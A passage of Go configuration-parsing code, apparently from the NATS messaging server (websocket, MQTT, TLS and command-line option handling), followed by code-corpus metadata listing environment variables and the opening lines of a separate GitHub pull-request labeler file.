tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "user", "username":
auth.user = mv.(string)
case "pass", "password":
auth.pass = mv.(string)
case "token":
auth.token = mv.(string)
case "timeout":
at := float64(1)
switch mv := mv.(type) {
case int64:
at = float64(mv)
case float64:
at = mv
}
auth.timeout = at
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
continue
}
}
return auth
}
func parseStringArray(fieldName string, tk token, lt *token, mv interface{}, errors *[]error, warnings *[]error) ([]string, error) {
switch mv := mv.(type) {
case string:
return []string{mv}, nil
case []interface{}:
strs := make([]string, 0, len(mv))
for _, val := range mv {
tk, val = unwrapValue(val, lt)
if str, ok := val.(string); ok {
strs = append(strs, str)
} else {
err := &configErr{tk, fmt.Sprintf("error parsing %s: unsupported type in array %T", fieldName, val)}
*errors = append(*errors, err)
continue
}
}
return strs, nil
default:
err := &configErr{tk, fmt.Sprintf("error parsing %s: unsupported type %T", fieldName, mv)}
*errors = append(*errors, err)
return nil, err
}
}
func parseWebsocket(v interface{}, o *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
gm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected websocket to be a map, got %T", v)}
}
for mk, mv := range gm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.Websocket.Host = hp.host
o.Websocket.Port = hp.port
case "port":
o.Websocket.Port = int(mv.(int64))
case "host", "net":
o.Websocket.Host = mv.(string)
case "advertise":
o.Websocket.Advertise = mv.(string)
case "no_tls":
o.Websocket.NoTLS = mv.(bool)
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
continue
}
if o.Websocket.TLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.Websocket.TLSMap = tc.Map
case "same_origin":
o.Websocket.SameOrigin = mv.(bool)
case "allowed_origins", "allowed_origin", "allow_origins", "allow_origin", "origins", "origin":
o.Websocket.AllowedOrigins, _ = parseStringArray("allowed origins", tk, <, mv, errors, warnings)
case "handshake_timeout":
ht := time.Duration(0)
switch mv := mv.(type) {
case int64:
ht = time.Duration(mv) * time.Second
case string:
var err error
ht, err = time.ParseDuration(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
default:
err := &configErr{tk, fmt.Sprintf("error parsing handshake timeout: unsupported type %T", mv)}
*errors = append(*errors, err)
}
o.Websocket.HandshakeTimeout = ht
case "compression":
o.Websocket.Compression = mv.(bool)
case "authorization", "authentication":
auth := parseSimpleAuth(tk, errors, warnings)
o.Websocket.Username = auth.user
o.Websocket.Password = auth.pass
o.Websocket.Token = auth.token
o.Websocket.AuthTimeout = auth.timeout
case "jwt_cookie":
o.Websocket.JWTCookie = mv.(string)
case "no_auth_user":
o.Websocket.NoAuthUser = mv.(string)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
func parseMQTT(v interface{}, o *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
gm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected mqtt to be a map, got %T", v)}
}
for mk, mv := range gm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.MQTT.Host = hp.host
o.MQTT.Port = hp.port
case "port":
o.MQTT.Port = int(mv.(int64))
case "host", "net":
o.MQTT.Host = mv.(string)
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
continue
}
if o.MQTT.TLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.MQTT.TLSTimeout = tc.Timeout
o.MQTT.TLSMap = tc.Map
case "authorization", "authentication":
auth := parseSimpleAuth(tk, errors, warnings)
o.MQTT.Username = auth.user
o.MQTT.Password = auth.pass
o.MQTT.Token = auth.token
o.MQTT.AuthTimeout = auth.timeout
case "no_auth_user":
o.MQTT.NoAuthUser = mv.(string)
case "ack_wait", "ackwait":
o.MQTT.AckWait = parseDuration("ack_wait", tk, mv, errors, warnings)
case "max_ack_pending", "max_pending", "max_inflight":
tmp := int(mv.(int64))
if tmp < 0 || tmp > 0xFFFF {
err := &configErr{tk, fmt.Sprintf("invalid value %v, should in [0..%d] range", tmp, 0xFFFF)}
*errors = append(*errors, err)
} else {
o.MQTT.MaxAckPending = uint16(tmp)
}
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
// GenTLSConfig loads TLS related configuration parameters.
func GenTLSConfig(tc *TLSConfigOpts) (*tls.Config, error) {
// Create the tls.Config from our options before including the certs.
// It will determine the cipher suites that we prefer.
// FIXME(dlc) change if ARM based.
config := tls.Config{
MinVersion: tls.VersionTLS12,
CipherSuites: tc.Ciphers,
PreferServerCipherSuites: true,
CurvePreferences: tc.CurvePreferences,
InsecureSkipVerify: tc.Insecure,
}
switch {
case tc.CertFile != "" && tc.KeyFile == "":
return nil, fmt.Errorf("missing 'key_file' in TLS configuration")
case tc.CertFile == "" && tc.KeyFile != "":
return nil, fmt.Errorf("missing 'cert_file' in TLS configuration")
case tc.CertFile != "" && tc.KeyFile != "":
// Now load in cert and private key
cert, err := tls.LoadX509KeyPair(tc.CertFile, tc.KeyFile)
if err != nil {
return nil, fmt.Errorf("error parsing X509 certificate/key pair: %v", err)
}
cert.Leaf, err = x509.ParseCertificate(cert.Certificate[0])
if err != nil {
return nil, fmt.Errorf("error parsing certificate: %v", err)
}
config.Certificates = []tls.Certificate{cert}
}
// Require client certificates as needed
if tc.Verify {
config.ClientAuth = tls.RequireAndVerifyClientCert
}
// Add in CAs if applicable.
if tc.CaFile != "" {
rootPEM, err := ioutil.ReadFile(tc.CaFile)
if err != nil || rootPEM == nil {
return nil, err
}
pool := x509.NewCertPool()
ok := pool.AppendCertsFromPEM(rootPEM)
if !ok {
return nil, fmt.Errorf("failed to parse root ca certificate")
}
config.ClientCAs = pool
}
return &config, nil
}
// MergeOptions will merge two options giving preference to the flagOpts
// if the item is present.
func MergeOptions(fileOpts, flagOpts *Options) *Options {
if fileOpts == nil {
return flagOpts
}
if flagOpts == nil {
return fileOpts
}
// Merge the two, flagOpts override
opts := *fileOpts
if flagOpts.Port != 0 {
opts.Port = flagOpts.Port
}
if flagOpts.Host != "" {
opts.Host = flagOpts.Host
}
if flagOpts.ClientAdvertise != "" {
opts.ClientAdvertise = flagOpts.ClientAdvertise
}
if flagOpts.Username != "" {
opts.Username = flagOpts.Username
}
if flagOpts.Password != "" {
opts.Password = flagOpts.Password
}
if flagOpts.Authorization != "" {
opts.Authorization = flagOpts.Authorization
}
if flagOpts.HTTPPort != 0 {
opts.HTTPPort = flagOpts.HTTPPort
}
if flagOpts.HTTPBasePath != "" {
opts.HTTPBasePath = flagOpts.HTTPBasePath
}
if flagOpts.Debug {
opts.Debug = true
}
if flagOpts.Trace {
opts.Trace = true
}
if flagOpts.Logtime {
opts.Logtime = true
}
if flagOpts.LogFile != "" {
opts.LogFile = flagOpts.LogFile
}
if flagOpts.PidFile != "" {
opts.PidFile = flagOpts.PidFile
}
if flagOpts.PortsFileDir != "" {
opts.PortsFileDir = flagOpts.PortsFileDir
}
if flagOpts.ProfPort != 0 {
opts.ProfPort = flagOpts.ProfPort
}
if flagOpts.Cluster.ListenStr != "" {
opts.Cluster.ListenStr = flagOpts.Cluster.ListenStr
}
if flagOpts.Cluster.NoAdvertise {
opts.Cluster.NoAdvertise = true
}
if flagOpts.Cluster.ConnectRetries != 0 {
opts.Cluster.ConnectRetries = flagOpts.Cluster.ConnectRetries
}
if flagOpts.Cluster.Advertise != "" {
opts.Cluster.Advertise = flagOpts.Cluster.Advertise
}
if flagOpts.RoutesStr != "" {
mergeRoutes(&opts, flagOpts)
}
return &opts
}
// RoutesFromStr parses route URLs from a string
func RoutesFromStr(routesStr string) []*url.URL {
routes := strings.Split(routesStr, ",")
if len(routes) == 0 {
return nil
}
routeUrls := []*url.URL{}
for _, r := range routes {
r = strings.TrimSpace(r)
u, _ := url.Parse(r)
routeUrls = append(routeUrls, u)
}
return routeUrls
}
// This will merge the flag routes and override anything that was present.
func mergeRoutes(opts, flagOpts *Options) {
routeUrls := RoutesFromStr(flagOpts.RoutesStr)
if routeUrls == nil {
return
}
opts.Routes = routeUrls
opts.RoutesStr = flagOpts.RoutesStr
}
// RemoveSelfReference removes this server from an array of routes
func RemoveSelfReference(clusterPort int, routes []*url.URL) ([]*url.URL, error) {
var cleanRoutes []*url.URL
cport := strconv.Itoa(clusterPort)
selfIPs, err := getInterfaceIPs()
if err != nil {
return nil, err
}
for _, r := range routes {
host, port, err := net.SplitHostPort(r.Host)
if err != nil {
return nil, err
}
ipList, err := getURLIP(host)
if err != nil {
return nil, err
}
if cport == port && isIPInList(selfIPs, ipList) {
continue
}
cleanRoutes = append(cleanRoutes, r)
}
return cleanRoutes, nil
}
func isIPInList(list1 []net.IP, list2 []net.IP) bool {
for _, ip1 := range list1 {
for _, ip2 := range list2 {
if ip1.Equal(ip2) {
return true
}
}
}
return false
}
func getURLIP(ipStr string) ([]net.IP, error) {
ipList := []net.IP{}
ip := net.ParseIP(ipStr)
if ip != nil {
ipList = append(ipList, ip)
return ipList, nil
}
hostAddr, err := net.LookupHost(ipStr)
if err != nil {
return nil, fmt.Errorf("Error looking up host with route hostname: %v", err)
}
for _, addr := range hostAddr {
ip = net.ParseIP(addr)
if ip != nil {
ipList = append(ipList, ip)
}
}
return ipList, nil
}
func getInterfaceIPs() ([]net.IP, error) {
var localIPs []net.IP
interfaceAddr, err := net.InterfaceAddrs()
if err != nil {
return nil, fmt.Errorf("Error getting self referencing address: %v", err)
}
for i := 0; i < len(interfaceAddr); i++ {
interfaceIP, _, _ := net.ParseCIDR(interfaceAddr[i].String())
if net.ParseIP(interfaceIP.String()) != nil {
localIPs = append(localIPs, interfaceIP)
} else {
return nil, fmt.Errorf("Error parsing self referencing address: %v", err)
}
}
return localIPs, nil
}
func setBaselineOptions(opts *Options) {
// Setup non-standard Go defaults
if opts.Host == "" {
opts.Host = DEFAULT_HOST
}
if opts.HTTPHost == "" {
// Default to same bind from server if left undefined
opts.HTTPHost = opts.Host
}
if opts.Port == 0 {
opts.Port = DEFAULT_PORT
} else if opts.Port == RANDOM_PORT {
// Choose randomly inside of net.Listen
opts.Port = 0
}
if opts.MaxConn == 0 {
opts.MaxConn = DEFAULT_MAX_CONNECTIONS
}
if opts.PingInterval == 0 {
opts.PingInterval = DEFAULT_PING_INTERVAL
}
if opts.MaxPingsOut == 0 {
opts.MaxPingsOut = DEFAULT_PING_MAX_OUT
}
if opts.TLSTimeout == 0 {
opts.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
if opts.AuthTimeout == 0 {
opts.AuthTimeout = getDefaultAuthTimeout(opts.TLSConfig, opts.TLSTimeout)
}
if opts.Cluster.Port != 0 {
if opts.Cluster.Host == "" {
opts.Cluster.Host = DEFAULT_HOST
}
if opts.Cluster.TLSTimeout == 0 {
opts.Cluster.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
if opts.Cluster.AuthTimeout == 0 {
opts.Cluster.AuthTimeout = getDefaultAuthTimeout(opts.Cluster.TLSConfig, opts.Cluster.TLSTimeout)
}
}
if opts.LeafNode.Port != 0 {
if opts.LeafNode.Host == "" {
opts.LeafNode.Host = DEFAULT_HOST
}
if opts.LeafNode.TLSTimeout == 0 {
opts.LeafNode.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
if opts.LeafNode.AuthTimeout == 0 {
opts.LeafNode.AuthTimeout = getDefaultAuthTimeout(opts.LeafNode.TLSConfig, opts.LeafNode.TLSTimeout)
}
}
// Set baseline connect port for remotes.
for _, r := range opts.LeafNode.Remotes {
if r != nil {
for _, u := range r.URLs {
if u.Port() == "" {
u.Host = net.JoinHostPort(u.Host, strconv.Itoa(DEFAULT_LEAFNODE_PORT))
}
}
}
}
// Set this regardless of opts.LeafNode.Port
if opts.LeafNode.ReconnectInterval == 0 {
opts.LeafNode.ReconnectInterval = DEFAULT_LEAF_NODE_RECONNECT
}
if opts.MaxControlLine == 0 {
opts.MaxControlLine = MAX_CONTROL_LINE_SIZE
}
if opts.MaxPayload == 0 {
opts.MaxPayload = MAX_PAYLOAD_SIZE
}
if opts.MaxPending == 0 {
opts.MaxPending = MAX_PENDING_SIZE
}
if opts.WriteDeadline == time.Duration(0) {
opts.WriteDeadline = DEFAULT_FLUSH_DEADLINE
}
if opts.MaxClosedClients == 0 {
opts.MaxClosedClients = DEFAULT_MAX_CLOSED_CLIENTS
}
if opts.LameDuckDuration == 0 {
opts.LameDuckDuration = DEFAULT_LAME_DUCK_DURATION
}
if opts.LameDuckGracePeriod == 0 {
opts.LameDuckGracePeriod = DEFAULT_LAME_DUCK_GRACE_PERIOD
}
if opts.Gateway.Port != 0 {
if opts.Gateway.Host == "" {
opts.Gateway.Host = DEFAULT_HOST
}
if opts.Gateway.TLSTimeout == 0 {
opts.Gateway.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
if opts.Gateway.AuthTimeout == 0 {
opts.Gateway.AuthTimeout = getDefaultAuthTimeout(opts.Gateway.TLSConfig, opts.Gateway.TLSTimeout)
}
}
if opts.ConnectErrorReports == 0 {
opts.ConnectErrorReports = DEFAULT_CONNECT_ERROR_REPORTS
}
if opts.ReconnectErrorReports == 0 {
opts.ReconnectErrorReports = DEFAULT_RECONNECT_ERROR_REPORTS
}
if opts.Websocket.Port != 0 {
if opts.Websocket.Host == "" {
opts.Websocket.Host = DEFAULT_HOST
}
}
if opts.MQTT.Port != 0 {
if opts.MQTT.Host == "" {
opts.MQTT.Host = DEFAULT_HOST
}
if opts.MQTT.TLSTimeout == 0 {
opts.MQTT.TLSTimeout = float64(TLS_TIMEOUT) / float64(time.Second)
}
}
// JetStream
if opts.JetStreamMaxMemory == 0 {
opts.JetStreamMaxMemory = -1
}
if opts.JetStreamMaxStore == 0 {
opts.JetStreamMaxStore = -1
}
}
func getDefaultAuthTimeout(tls *tls.Config, tlsTimeout float64) float64 {
var authTimeout float64
if tls != nil {
authTimeout = tlsTimeout + 1.0
} else {
authTimeout = float64(AUTH_TIMEOUT / time.Second)
}
return authTimeout
}
// ConfigureOptions accepts a flag set and augments it with NATS Server
// specific flags. On success, an options structure is returned configured
// based on the selected flags and/or configuration file.
// The command line options take precedence to the ones in the configuration file.
func ConfigureOptions(fs *flag.FlagSet, args []string, printVersion, printHelp, printTLSHelp func()) (*Options, error) {
opts := &Options{}
var (
showVersion bool
showHelp bool
showTLSHelp bool
signal string
configFile string
dbgAndTrace bool
trcAndVerboseTrc bool
dbgAndTrcAndVerboseTrc bool
err error
)
fs.BoolVar(&showHelp, "h", false, "Show this message.")
fs.BoolVar(&showHelp, "help", false, "Show this message.")
fs.IntVar(&opts.Port, "port", 0, "Port to listen on.")
fs.IntVar(&opts.Port, "p", 0, "Port to listen on.")
fs.StringVar(&opts.ServerName, "n", "", "Server name.")
fs.StringVar(&opts.ServerName, "name", "", "Server name.")
fs.StringVar(&opts.Host, "addr", "", "Network host to listen on.")
fs.StringVar(&opts.Host, "a", "", "Network host to listen on.")
fs.StringVar(&opts.Host, "net", "", "Network host to listen on.")
fs.StringVar(&opts.ClientAdvertise, "client_advertise", "", "Client URL to advertise to other servers.")
fs.BoolVar(&opts.Debug, "D", false, "Enable Debug logging.")
fs.BoolVar(&opts.Debug, "debug", false, "Enable Debug logging.")
fs.BoolVar(&opts.Trace, "V", false, "Enable Trace logging.")
fs.BoolVar(&trcAndVerboseTrc, "VV", false, "Enable Verbose Trace logging. (Traces system account as well)")
fs.BoolVar(&opts.Trace, "trace", false, "Enable Trace logging.")
fs.BoolVar(&dbgAndTrace, "DV", false, "Enable Debug and Trace logging.")
fs.BoolVar(&dbgAndTrcAndVerboseTrc, "DVV", false, "Enable Debug and Verbose Trace logging. (Traces system account as well)")
fs.BoolVar(&opts.Logtime, "T", true, "Timestamp log entries.")
fs.BoolVar(&opts.Logtime, "logtime", true, "Timestamp log entries.")
fs.StringVar(&opts.Username, "user", "", "Username required for connection.")
fs.StringVar(&opts.Password, "pass", "", "Password required for connection.")
fs.StringVar(&opts.Authorization, "auth", "", "Authorization token required for connection.")
fs.IntVar(&opts.HTTPPort, "m", 0, "HTTP Port for /varz, /connz endpoints.")
fs.IntVar(&opts.HTTPPort, "http_port", 0, "HTTP Port for /varz, /connz endpoints.")
fs.IntVar(&opts.HTTPSPort, "ms", 0, "HTTPS Port for /varz, /connz endpoints.")
fs.IntVar(&opts.HTTPSPort, "https_port", 0, "HTTPS Port for /varz, /connz endpoints.")
fs.StringVar(&configFile, "c", "", "Configuration file.")
fs.StringVar(&configFile, "config", "", "Configuration file.")
fs.BoolVar(&opts.CheckConfig, "t", false, "Check configuration and exit.")
fs.StringVar(&signal, "sl", "", "Send signal to nats-server process (stop, quit, reopen, reload).")
fs.StringVar(&signal, "signal", "", "Send signal to nats-server process (stop, quit, reopen, reload).")
fs.StringVar(&opts.PidFile, "P", "", "File to store process pid.")
fs.StringVar(&opts.PidFile, "pid", "", "File to store process pid.")
fs.StringVar(&opts.PortsFileDir, "ports_file_dir", "", "Creates a ports file in the specified directory (<executable_name>_<pid>.ports).")
fs.StringVar(&opts.LogFile, "l", "", "File to store logging output.")
fs.StringVar(&opts.LogFile, "log", "", "File to store logging output.")
fs.Int64Var(&opts.LogSizeLimit, "log_size_limit", 0, "Logfile size limit being auto-rotated")
fs.BoolVar(&opts.Syslog, "s", false, "Enable syslog as log method.")
fs.BoolVar(&opts.Syslog, "syslog", false, "Enable syslog as log method.")
fs.StringVar(&opts.RemoteSyslog, "r", "", "Syslog server addr (udp://127.0.0.1:514).")
fs.StringVar(&opts.RemoteSyslog, "remote_syslog", "", "Syslog server addr (udp://127.0.0.1:514).")
fs.BoolVar(&showVersion, "version", false, "Print version information.")
fs.BoolVar(&showVersion, "v", false, "Print version information.")
fs.IntVar(&opts.ProfPort, "profile", 0, "Profiling HTTP port.")
fs.StringVar(&opts.RoutesStr, "routes", "", "Routes to actively solicit a connection.")
fs.StringVar(&opts.Cluster.ListenStr, "cluster", "", "Cluster url from which members can solicit routes.")
fs.StringVar(&opts.Cluster.ListenStr, "cluster_listen", "", "Cluster url from which members can solicit routes.")
fs.StringVar(&opts.Cluster.Advertise, "cluster_advertise", "", "Cluster URL to advertise to other servers.")
fs.BoolVar(&opts.Cluster.NoAdvertise, "no_advertise", false, "Advertise known cluster IPs to clients.")
fs.IntVar(&opts.Cluster.ConnectRetries, "connect_retries", 0, "For implicit routes, number of connect retries.")
fs.StringVar(&opts.Cluster.Name, "cluster_name", "", "Cluster Name, if not set one will be dynamically generated.")
fs.BoolVar(&showTLSHelp, "help_tls", false, "TLS help.")
fs.BoolVar(&opts.TLS, "tls", false, "Enable TLS.")
fs.BoolVar(&opts.TLSVerify, "tlsverify", false, "Enable TLS with client verification.")
fs.StringVar(&opts.TLSCert, "tlscert", "", "Server certificate file.")
fs.StringVar(&opts.TLSKey, "tlskey", "", "Private key for server certificate.")
fs.StringVar(&opts.TLSCaCert, "tlscacert", "", "Client certificate CA for verification.")
fs.IntVar(&opts.MaxTracedMsgLen, "max_traced_msg_len", 0, "Maximum printable length for traced messages. 0 for unlimited.")
fs.BoolVar(&opts.JetStream, "js", false, "Enable JetStream.")
fs.BoolVar(&opts.JetStream, "jetstream", false, "Enable JetStream.")
fs.StringVar(&opts.StoreDir, "sd", "", "Storage directory.")
fs.StringVar(&opts.StoreDir, "store_dir", "", "Storage directory.")
// The flags definition above set "default" values to some of the options.
// Calling Parse() here will override the default options with any value
// specified from the command line. This is ok. We will then update the
// options with the content of the configuration file (if present), and then,
// call Parse() again to override the default+config with command line values.
// Calling Parse() before processing config file is necessary since configFile
// itself is a command line argument, and also Parse() is required in order
// to know if user wants simply to show "help" or "version", etc...
if err := fs.Parse(args); err != nil {
return nil, err
}
if showVersion {
printVersion()
return nil, nil
}
if showHelp {
printHelp()
return nil, nil
}
if showTLSHelp {
printTLSHelp()
return nil, nil
}
// Process args looking for non-flag options,
// 'version' and 'help' only for now
showVersion, showHelp, err = ProcessCommandLineArgs(fs)
if err != nil {
return nil, err
} else if showVersion {
printVersion()
return nil, nil
} else if showHelp {
printHelp()
return nil, nil
}
// Snapshot flag options.
FlagSnapshot = opts.Clone()
// Keep track of the boolean flags that were explicitly set with their value.
fs.Visit(func(f *flag.Flag) {
switch f.Name {
case "DVV":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Debug", dbgAndTrcAndVerboseTrc)
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Trace", dbgAndTrcAndVerboseTrc)
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "TraceVerbose", dbgAndTrcAndVerboseTrc)
case "DV":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Debug", dbgAndTrace)
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Trace", dbgAndTrace)
case "D":
fallthrough
case "debug":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Debug", FlagSnapshot.Debug)
case "VV":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Trace", trcAndVerboseTrc)
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "TraceVerbose", trcAndVerboseTrc)
case "V":
fallthrough
case "trace":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Trace", FlagSnapshot.Trace)
case "T":
fallthrough
case "logtime":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Logtime", FlagSnapshot.Logtime)
case "s":
fallthrough
case "syslog":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Syslog", FlagSnapshot.Syslog)
case "no_advertise":
trackExplicitVal(FlagSnapshot, &FlagSnapshot.inCmdLine, "Cluster.NoAdvertise", FlagSnapshot.Cluster.NoAdvertise)
}
})
// Process signal control.
if signal != "" {
if err := processSignal(signal); err != nil {
return nil, err
}
}
// Parse config if given
if configFile != "" {
// This will update the options with values from the config file.
err := opts.ProcessConfigFile(configFile)
if err != nil {
if opts.CheckConfig {
return nil, err
}
if cerr, ok := err.(*processConfigErr); !ok || len(cerr.Errors()) != 0 {
return nil, err
}
// If we get here we only have warnings and can still continue
fmt.Fprint(os.Stderr, err)
} else if opts.CheckConfig {
// Report configuration file syntax test was successful and exit.
return opts, nil
}
// Call this again to override config file options with options from command line.
// Note: We don't need to check error here since if there was an error, it would
// have been caught the first time this function was called (after setting up the
// flags).
fs.Parse(args)
} else if opts.CheckConfig {
return nil, fmt.Errorf("must specify [-c, --config] option to check configuration file syntax")
}
// Special handling of some flags
var (
flagErr error
tlsDisabled bool
tlsOverride bool
)
fs.Visit(func(f *flag.Flag) {
// short-circuit if an error was encountered
if flagErr != nil {
return
}
if strings.HasPrefix(f.Name, "tls") {
if f.Name == "tls" {
if !opts.TLS {
// User has specified "-tls=false", we need to disable TLS
opts.TLSConfig = nil
tlsDisabled = true
tlsOverride = false
return
}
tlsOverride = true
} else if !tlsDisabled {
tlsOverride = true
}
} else {
switch f.Name {
case "VV":
opts.Trace, opts.TraceVerbose = trcAndVerboseTrc, trcAndVerboseTrc
case "DVV":
opts.Trace, opts.Debug, opts.TraceVerbose = dbgAndTrcAndVerboseTrc, dbgAndTrcAndVerboseTrc, dbgAndTrcAndVerboseTrc
case "DV":
// Check value to support -DV=false
opts.Trace, opts.Debug = dbgAndTrace, dbgAndTrace
case "cluster", "cluster_listen":
// Override cluster config if explicitly set via flags.
flagErr = overrideCluster(opts)
case "routes":
// Keep in mind that the flag has updated opts.RoutesStr at this point.
if opts.RoutesStr == "" {
// Set routes array to nil since routes string is empty
opts.Routes = nil
return
}
routeUrls := RoutesFromStr(opts.RoutesStr)
opts.Routes = routeUrls
}
}
})
if flagErr != nil {
return nil, flagErr
}
// This will be true if some of the `-tls` params have been set and
// `-tls=false` has not been set.
if tlsOverride {
if err := overrideTLS(opts); err != nil {
return nil, err
}
}
// If we don't have cluster defined in the configuration
// file and no cluster listen string override, but we do
// have a routes override, we need to report misconfiguration.
if opts.RoutesStr != "" && opts.Cluster.ListenStr == "" && opts.Cluster.Host == "" && opts.Cluster.Port == 0 {
return nil, errors.New("solicited routes require cluster capabilities, e.g. --cluster")
}
return opts, nil
}
func normalizeBasePath(p string) string {
if len(p) == 0 {
return "/"
}
// add leading slash
if p[0] != '/' {
p = "/" + p
}
return path.Clean(p)
}
// overrideTLS is called when at least "-tls=true" has been set.
func overrideTLS(opts *Options) error {
if opts.TLSCert == "" {
return errors.New("TLS Server certificate must be present and valid")
}
if opts.TLSKey == "" {
return errors.New("TLS Server private key must be present and valid")
}
tc := TLSConfigOpts{}
tc.CertFile = opts.TLSCert
tc.KeyFile = opts.TLSKey
tc.CaFile = opts.TLSCaCert
tc.Verify = opts.TLSVerify
var err error
opts.TLSConfig, err = GenTLSConfig(&tc)
return err
}
// overrideCluster updates Options.Cluster if that flag "cluster" (or "cluster_listen")
// has explicitly be set in the command line. If it is set to empty string, it will
// clear the Cluster options.
func overrideCluster(opts *Options) error {
if opts.Cluster.ListenStr == "" {
// This one is enough to disable clustering.
opts.Cluster.Port = 0
return nil
}
// -1 will fail url.Parse, so if we have -1, change it to
// 0, and then after parse, replace the port with -1 so we get
// automatic port allocation
wantsRandom := false
if strings.HasSuffix(opts.Cluster.ListenStr, ":-1") {
wantsRandom = true
cls := fmt.Sprintf("%s:0", opts.Cluster.ListenStr[0:len(opts.Cluster.ListenStr)-3])
opts.Cluster.ListenStr = cls
}
clusterURL, err := url.Parse(opts.Cluster.ListenStr)
if err != nil {
return err
}
h, p, err := net.SplitHostPort(clusterURL.Host)
if err != nil {
return err
}
if wantsRandom {
p = "-1"
}
opts.Cluster.Host = h
_, err = fmt.Sscan(p, &opts.Cluster.Port)
if err != nil {
return err
}
if clusterURL.User != nil {
pass, hasPassword := clusterURL.User.Password()
if !hasPassword {
return errors.New("expected cluster password to be set")
}
opts.Cluster.Password = pass
user := clusterURL.User.Username()
opts.Cluster.Username = user
} else {
// Since we override from flag and there is no user/pwd, make
// sure we clear what we may have gotten from config file.
opts.Cluster.Username = ""
opts.Cluster.Password = ""
}
return nil
}
func processSignal(signal string) error {
var (
pid string
commandAndPid = strings.Split(signal, "=")
)
if l := len(commandAndPid); l == 2 {
pid = maybeReadPidFile(commandAndPid[1])
} else if l > 2 {
return fmt.Errorf("invalid signal parameters: %v", commandAndPid[2:])
}
if err := ProcessSignal(Command(commandAndPid[0]), pid); err != nil {
return err
}
os.Exit(0)
return nil
}
// maybeReadPidFile returns a PID or Windows service name obtained via the following method:
// 1. Try to open a file with path "pidStr" (absolute or relative).
// 2. If such a file exists and can be read, return its contents.
// 3. Otherwise, return the original "pidStr" string.
func maybeReadPidFile(pidStr string) string {
if b, err := ioutil.ReadFile(pidStr); err == nil {
return string(b)
}
return pidStr
}
func homeDir() (string, error) {
if runtime.GOOS == "windows" {
homeDrive, homePath := os.Getenv("HOMEDRIVE"), os.Getenv("HOMEPATH")
userProfile := os.Getenv("USERPROFILE")
home := filepath.Join(homeDrive, homePath)
if homeDrive == "" || homePath == "" {
if userProfile == "" {
return "", errors.New("nats: failed to get home dir, require %HOMEDRIVE% and %HOMEPATH% or %USERPROFILE%")
}
home = userProfile
}
return home, nil
}
home := os.Getenv("HOME")
if home == "" {
return "", errors.New("failed to get home dir, require $HOME")
}
return home, nil
}
func expandPath(p string) (string, error) {
p = os.ExpandEnv(p)
if !strings.HasPrefix(p, "~") {
return p, nil
}
home, err := homeDir()
if err != nil {
return "", err
}
return filepath.Join(home, p[1:]), nil
}
|
[
"\"HOMEDRIVE\"",
"\"HOMEPATH\"",
"\"USERPROFILE\"",
"\"HOME\""
] |
[] |
[
"USERPROFILE",
"HOME",
"HOMEPATH",
"HOMEDRIVE"
] |
[]
|
["USERPROFILE", "HOME", "HOMEPATH", "HOMEDRIVE"]
|
go
| 4 | 0 | |
pkg/labeler.go
|
package labeler
import (
"fmt"
"io/ioutil"
"log"
"math"
"net/http"
"os"
"regexp"
"strconv"
"strings"
gh "github.com/google/go-github/v27/github"
"github.com/rharper-sapient/diffparser"
)
type LabelerConfig map[string]LabelMatcher
type LabelMatcher struct {
Title string
Branch string
Files []string
Mergeable string
SizeBelow string `yaml:"size-below"`
SizeAbove string `yaml:"size-above"`
}
// LabelUpdates Represents a request to update the set of labels
type LabelUpdates struct {
set map[string]bool
}
type Labeler struct {
FetchRepoConfig func(owner string, repoName string) (*LabelerConfig, error)
ReplaceLabelsForPr func(owner string, repoName string, prNumber int, labels []string) error
GetCurrentLabels func(owner string, repoName string, prNumber int) ([]string, error)
}
type Condition struct {
Evaluate func(pr *gh.PullRequest, matcher LabelMatcher) (bool, error)
GetName func() string
}
func NewTitleCondition() Condition {
return Condition{
GetName: func() string {
